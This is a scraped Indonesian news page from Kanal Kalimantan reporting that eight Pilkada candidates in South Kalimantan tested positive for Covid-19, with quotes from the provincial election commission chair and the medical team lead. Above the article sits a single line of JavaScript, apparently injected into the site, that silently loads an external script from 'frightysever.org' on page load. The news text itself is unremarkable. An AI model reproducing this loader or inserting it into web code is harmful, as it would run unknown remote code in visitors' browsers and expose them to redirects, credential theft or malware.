(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

8 Kontestan Pilkada di Kalsel Ternyata Terpapar Covid-19


KANALKALIMANTAN.COM, BANJARMASIN – Pemeriksaan kesehatan bakal pasangan calon (bapaslon) Pemilihan Kepala Daerah (Pilkada) serentak di Kalimantan Selatan sudah dimulai sejak Minggu (6/9/2020) di RSUD Ulin Banjarmasin.

Belakangan diketahui ada 8 kontestan bakal calon (Balon) kepala daerah yang dinyatakan terkonfirmasi positif Covid-19.

Informasi dihimpun, ada 4 Balon kepala daerah yang dinyatakan positif Covid-19 dan saat ini tengah menjalani karantina mandiri.

Sementara dari hasil tes kesehatan di RSUD Ulin mendapati 4 Balon kepala daerah positif Covid-19 saat pemeriksaan kesehatan.

Sehingga dipastikan ada 8 Balon kepala daerah peserta Pilkada di Kalsel terjangkiti virus corona. Namun hingga kini, belum diketahui pasti nama-nama Balon dari daerah mana saja yang dinyatakan positif Covid-19 itu.

Tes kesehatan bakal calon kepala daerah di RSUD Ulin Banjarmasin, Senin (7/9/2020). foto: ist

“Empat orang yang sebelumnya, (yaitu) sebelum pendaftaran itu terkonfirmasi positif Covid-19. Sehingga kita menggunakan protokol Covid-19, tidak perlu hadir tetapi bisa melewati zoom meeting,” kata Ketua KPU Provinsi Kalsel Sarmuji, Senin (7/9/2020).

Konsekuensinya, pemeriksaan kesehatan untuk Balon kepala daerah yang positif Covid-19 menjadi tertunda.

Menurut Sarmuji, 8 Balon kepala daerah itu dapat menjalani pemeriksaan kesehatan jika sudah dinyatakan sembuh. Kendati demikian, Sarmuji tidak mau menyebut nama-nama Balon kepala daerah yang dimaksud.

Lalu, apakah berdampak pada penetapan bakal calon kepala daerah untuk maju di Pilkada? “Kita menunggu aturan dari KPU, bagaimana nanti bapaslon yang positif Covid-19 ini dirawat sampai tanggal penetapan. Apakah melanjutkan atau menunggu. Kita tunggu saja aturan dari KPU RI,” lugas Sarmuji.

Sarmuji juga memastikan tidak ada Balon kepala daerah yang dinyatakan positif Covid-19 saat pemeriksaan kesehatan yang dilakukan Senin (7/9/2020).

Pemeriksaan kesehatan calon kepala daerah peserta Pilkada Serentak di RSUD Ulin, Banjarmasin, Minggu (6/9/2020). foto: ist

Seperti diketahui, dua bakal pasangan calon Gubernur dan Wakil Gubernur Kalsel H Sahbirin Noor-H Muhidin dan Denny Indrayana-Difriadi Darjat menjalani pemeriksaan kesehatan.

“(Bakal calon kepala daerah) yang menjalani pemeriksaan kesehatan hari ini semua negatif, mudah-mudahan besok tidak ada positif Covid-19. Alhamdulillah, kita sedikit tenang untuk Pilkada provinsi,” imbuh Sarmuji.

Nantinya, baik Sahbirin-Muhidin dan Denny-Difri akan menjalani pemeriksaan kesehatan lanjutan, seperti treadmill. Hasilnya sendiri akan keluar pada 12 September mendatang.

Baca juga : Tak Hadir Saat Pendaftaran di KPU Banjarbaru, Aditya Ternyata Positif Covid-19

Ketua Tim Dokter Pemeriksaan Kesehatan Bapaslon Pilkada Kalsel dr M Rudiansyah juga membenarkan ada 4 balon kepala daerah yang positif Covid-19 setelah pemeriksaan kesehatan dilakukan. “Ya, betul. Tidak masalah,” kata dr. Rudiansyah.

Ketua IDI Kalsel ini menambahkan, kendati ada Balon kepala daerah yang positif Covid-19, tidak membuat pencalonan gugur. Hanya, pemeriksaan kesehatan menjadi tertunda, lantaran harus menjalani isolasi.

“Kita periksa kesehatannya, yang harusnya hari ini kita undur dari 2 hari hingga 14 hari ke depan. Kita jadwal ulang pemeriksaannya,” kata dr Rudiansyah.

Rudiansyah menambahkan, bakal calon kepala daerah yang positif Covid-19 dapat menjalani perawatan dalam karantina mandiri baik di rumah sakit, kediaman maupun hotel.  (kanalklaimantan.com/fikri)

Reporter : fikri
Editor : bie

Al Ghifari

Recent Posts

Akhir Pekan Pasti Hemat, Berikut Promo BRI hingga 30 Persen di 8 Kota Indonesia

KANALKALIMANTAN.COM – Bagi sebagian orang, akhir pekan (weekend) merupakan waktu yang dinanti. Sembari rehat bekerja,… Read More

2 jam ago

Diskusi Santai “Komunitas Gembel Banjarmasin” Bahas Kesejahteraan Buruh

KANALKALIMANTAN.COM, BANJARMASIN - Masih dalam momentum Hari Buruh 2024, Komunitas Gemar Belajar (Gembel) Banjarmasin menggelar… Read More

10 jam ago

Penyediaan Rumah ASN dan Tenaga Kontrak, Pemkab Kapuas Gandeng Pengembang Perumahan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat Bupati Kapuas Erlin Hardi melakukan penandatanganan MoU antara PT Mahakarya… Read More

11 jam ago

Status Internasional Dicabut, Bandara Syamsudin Noor Tetap Jadi Embarkasi Haji

KANALKALIMANTAN.COM, BANJARBARU - Kementerian Perhubungan (Kemenhub) memutuskan mencabut status Bandara Syamsudin Noor Banjarmasin di Banjarbaru… Read More

13 jam ago

Syarat Calon Non Partai Pilkada Banjarmasin Wajib Miliki 41 Ribu KTP Dukungan

KANALKALIMANTAN.COM, BANJARMASIN - Jelang Pemilihan Kepala Daerah (Pilkada) 2024, kandidat bakal calon Wali Kota dan… Read More

14 jam ago

MUI Banjar Berikan Pembekalan kepada Jemaah Calon Haji Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Jemaah Calon Haji (JCH) Kabupaten Banjar Tahun 2024 yang seluruhnya berjumlah 452… Read More

15 jam ago

This website uses cookies.